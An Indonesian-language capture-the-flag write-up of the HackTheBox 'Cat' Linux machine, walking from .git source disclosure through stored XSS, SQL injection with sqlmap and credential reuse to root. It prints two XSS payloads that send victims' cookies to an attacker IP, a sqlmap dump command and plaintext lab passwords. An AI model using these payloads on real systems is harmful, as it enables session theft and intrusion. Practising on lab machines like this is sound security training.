
Ini adalah writeup HTB Cat Linux Medium yang dibuat pada tahun 2025. Panduan ini akan menjelaskan proses eksploitasi mesin Linux tingkat Medium secara menyeluruh.
Dalam HTB writeup 2025 ini, kita akan mempelajari berbagai teknik seperti enumerasi, XSS, SQL injection, dan privilege escalation hingga akses root.
Daftar Isi
- Informasi Umum Machine
- Enumeration
- Eksploitasi
- Privilege Escalation
- Root Flag
- Kesimpulan
- Artikel Terkait
Informasi Umum Machine
- Nama Mesin: Cat
- Platform: HackTheBox (HTB)
- Sistem Operasi: Linux
- Tingkat Kesulitan: Medium
- IP Target: 10.10.11.53
Eksploitasi - HTB Cat Linux Medium Writeup
Enumeration
Nmap Scan
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Gobuster / Dirsearch
Ditemukan direktori tersembunyi seperti .git/, /config.php, dan /admin.php yang redirect ke /join.php.
GitTools
Menggunakan gitdumper dan extractor dari GitTools untuk mengekstrak source code aplikasi PHP yang tidak dihapus dari direktori .git.
Eksploitasi
Stored XSS (join.php)
Aplikasi menyimpan input user secara langsung tanpa validasi ke dalam database. Payload XSS dimasukkan ke field username:
<script>document.location='http://10.10.xx.xx:4444/?c='+document.cookie;</script>
SQL Injection (accept_cat.php)
SQLi terdapat pada parameter catName. Menggunakan SQLMap dengan cookies admin yang didapat via XSS:
sqlmap -r req.txt -p catName --level 3 --risk 3 --batch --random-agent --dbms=sqlite --dump
SSH Access
Ditemukan kredensial:
- rosa: soyunaprincesarosa
ssh rosa@10.10.11.53
Privilege Escalation
Apache Access Log
Melalui /var/log/apache2/access.log, ditemukan kredensial user axel:
axel:aNdZwgC4tI9gnVXv_e3Q
Port Forwarding ke Gitea
Ada service Gitea pada localhost:3000, dapat diakses melalui port forwarding:
ssh -L 3000:127.0.0.1:3000 axel@10.10.11.53
XSS di Gitea
Gitea rentan terhadap XSS. Mengirim email ke jobert@localhost dengan payload XSS yang membaca README.md pada repo privat.
<a href="javascript:fetch('http://10.10.xx.xx:4444/?d='+encodeURIComponent(btoa(document.cookie)))">XSS test</a>
Root Credentials
Dari hasil XSS, ditemukan source index.php yang berisi kredensial Basic Auth:
Username: admin Password: IKw75eR0MR7CMIxhH0
Login ke Root
su root Password: IKw75eR0MR7CMIxhH0
Root Flag
cat /root/root.txt
[TERCENSORED - FLAG DISEMBUNYIKAN]
Kesimpulan
Mesin HTB Cat Linux Medium menunjukkan pentingnya menjaga direktori sensitif seperti .git agar tidak terekspos.
Melalui kombinasi source code disclosure, XSS, dan SQL Injection, kami mendapatkan akses administratif dan kemudian root.
Writeup HTB Cat ini termasuk dalam HTB writeup 2025 yang memperlihatkan kerentanan nyata dalam aplikasi web dan layanan internal seperti Gitea.
